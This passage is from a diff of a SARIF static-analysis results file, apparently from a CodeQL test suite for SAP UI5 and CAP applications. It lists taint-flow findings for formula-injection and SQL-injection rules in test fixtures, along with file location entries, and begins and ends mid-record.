"%SRCROOT%", - "index" : 145 - }, - "region" : { - "startLine" : 17, - "startColumn" : 27, - "endColumn" : 45 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-property-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 150 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 163 + } }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "9afa5fd07ee36af6:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 155 - }, - "region" : { - "startLine" : 9, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 9, - "startColumn" : 23, - "endColumn" : 41 - } - }, - "message" : { - "text" : "{ type: \"string\" }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - 
"startLine" : 15, - "startColumn" : 29, - "endColumn" : 47 - } - }, - "message" : { - "text" : "oControl.getText()" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 15, - "startColumn" : 21, - "endColumn" : 47 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 58 - } - }, - "message" : { - "text" : "value" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 46, - "endColumn" : 59 - } - }, - "message" : { - "text" : "String(value)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 36, - "endColumn" : 60 - } - }, - "message" : { - "text" : "encodeX ... 
value))" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 17, - "startColumn" : 21, - "endColumn" : 60 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js", - "uriBaseId" : "%SRCROOT%", - "index" : 154 - }, - "region" : { - "startLine" : 23, - "startColumn" : 27, - "endColumn" : 39 - } - }, - "message" : { - "text" : "xssSanitized" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 159 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 164 + } }, { - "ruleId" : "js/ui5-formula-injection", - "rule" : { - "id" : "js/ui5-formula-injection", - "index" : 4, - "toolComponent" : { - "index" : 2 - } - }, - "message" : { - "text" : "The content of a saved file depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e701acdf85af03b4:1", - "primaryLocationStartColumnFingerprint" : "10" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "value={/input}" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 10, - "startColumn" : 17, - "endColumn" : 28 - } - }, - "message" : { - "text" : "input: null" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js", - "uriBaseId" : "%SRCROOT%", - "index" : 166 - }, - "region" : { - "startLine" : 16, - "startColumn" : 23, - "endColumn" : 51 - } - }, - "message" : { - "text" : "oModel. ... 
input')" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/view/app.view.xml", - "uriBaseId" : "%SRCROOT%", - "index" : 167 - }, - "region" : { - "startLine" : 5, - "startColumn" : 5, - "endLine" : 7, - "endColumn" : 29 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 165 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "e5ae8639cd6967fb:1", - "primaryLocationStartColumnFingerprint" : "29" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - 
"location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 50, - "endColumn" : 54 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 44, - "endColumn" : 56 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { 
- "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 19, - "endColumn" : 57 - } - }, - "message" : { - "text" : "SELECT. ... book}`)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 12, - "startColumn" : 11, - "endColumn" : 57 - } - }, - "message" : { - "text" : "query" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 13, - "startColumn" : 36, - "endColumn" : 41 - } - }, - "message" : { - "text" : "query" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 166 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "b41554298e90b620:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", 
- "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 58, - "endColumn" : 62 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "`ID=${book}`" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 15, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... 
book}`)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 167 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "967d7be3edc97a9e:1", - "primaryLocationStartColumnFingerprint" : "30" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - 
"uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 53, - "endColumn" : 57 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 45, - "endColumn" : 57 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { 
- "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 20, - "endColumn" : 58 - } - }, - "message" : { - "text" : "SELECT. ... + book)" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 17, - "startColumn" : 11, - "endColumn" : 58 - } - }, - "message" : { - "text" : "query2" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 18, - "startColumn" : 37, - "endColumn" : 43 - } - }, - "message" : { - "text" : "query2" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 168 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." 
- }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "1c132adaa6986472:1", - "primaryLocationStartColumnFingerprint" : "20" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", 
- "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 60, - "endColumn" : 64 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 52, - "endColumn" : 64 - } - }, - "message" : { - "text" : "'ID=' + book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 20, - "startColumn" : 27, - "endColumn" : 65 - } - }, - "message" : { - "text" : "SELECT. ... 
+ book)" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 169 + } }, { - "ruleId" : "js/cap-sql-injection", - "rule" : { - "id" : "js/cap-sql-injection", - "index" : 0, - "toolComponent" : { - "index" : 0 - } - }, - "message" : { - "text" : "This query depends on a [user-provided value](1)." - }, - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 28, - "startColumn" : 39, - "endColumn" : 42 - } - } - } ], - "partialFingerprints" : { - "primaryLocationLineHash" : "144d55d233768c80:1", - "primaryLocationStartColumnFingerprint" : "32" - }, - "codeFlows" : [ { - "threadFlows" : [ { - "locations" : [ { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 7, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 37 - } - }, - "message" : { - "text" : "req" - } - } - }, { - "location" : { - "physicalLocation" : { - 
"artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 34, - "endColumn" : 42 - } - }, - "message" : { - "text" : "req.data" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 31 - } - }, - "message" : { - "text" : "{ book, quantity }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 15, - "endColumn" : 19 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 8, - "startColumn" : 13, - "endColumn" : 42 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - }, - "region" : { - "startLine" : 27, - "startColumn" : 59, - "endColumn" : 63 - } - }, - "message" : { - "text" : "book" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - 